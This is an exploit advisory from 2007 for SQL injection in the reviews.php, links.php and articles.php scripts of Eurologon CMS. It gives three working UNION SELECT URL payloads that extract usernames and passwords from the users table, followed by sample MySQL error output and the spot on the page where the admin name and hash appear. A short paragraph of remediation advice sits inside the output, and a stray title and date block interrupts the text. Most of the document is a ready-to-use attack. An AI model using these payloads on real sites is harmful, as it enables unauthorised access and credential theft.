1 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
2 ____ __________ __ ____ __
3 /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
4 | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
5 | | | \ | |/ \ \___| | /_____/ | || |
6 |___|___| /\__| /______ /\___ >__| |___||__|
7 \/\______| \/ \/
8 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
9
10 Http://www.inj3ct−it.org
Staff[at]inj3ct−it[dot]org
11
12 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
13
14 Eurologon CMS reviews.php/links.php/articles.php SQL Injection
15
16 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
17
18 #By KiNgOfThEwOrLd
19
20 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
21 PoC
22
23 Useless..
24 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
25 Exploit
26
27 http://[target]/reviews.php?id=’+union+select+1,concat(username,0x3a,password)
28 +from+users/*
29 http://[target]/links.php?id=’+union+select+1,concat(username,0x3a,password)
30 +from+users/*
31 http://[target]/articles.php?id=’+union+select+1,concat(username,0x3a,password)
32 +from+users/*
33 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
34 Result
35
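36 The disclosed information appears beneath several MySQL errors such as the ones below. The page prints the failing query and the raw MySQL error to the visitor, which suggests the `id` parameter reaches the query unescaped in all three scripts; binding `id` as a query parameter (or casting it to an integer) and returning a generic error page would address both problems.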
37
38 Can’t execute query
39
40 [QUERY]
41
42
43 MySQL Error: The used SELECT statements have a different number of columns
44 Can’t execute query
45
46 [QUERY]
47
48 MySQL Error: The used SELECT statements have a different number of columns
49 Can’t execute query
50
51 [QUERY]
52
Eurologon CMS Multiple Remote SQL Injection Vulnerabilities
KiNgOfThEwOrLd
11/27/2007
53 MySQL Error: The used SELECT statements have a different number of columns
54
55 Home > [category_name] > [category_name] > [admin_name]:[admin_hash]
56 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
57
58 # m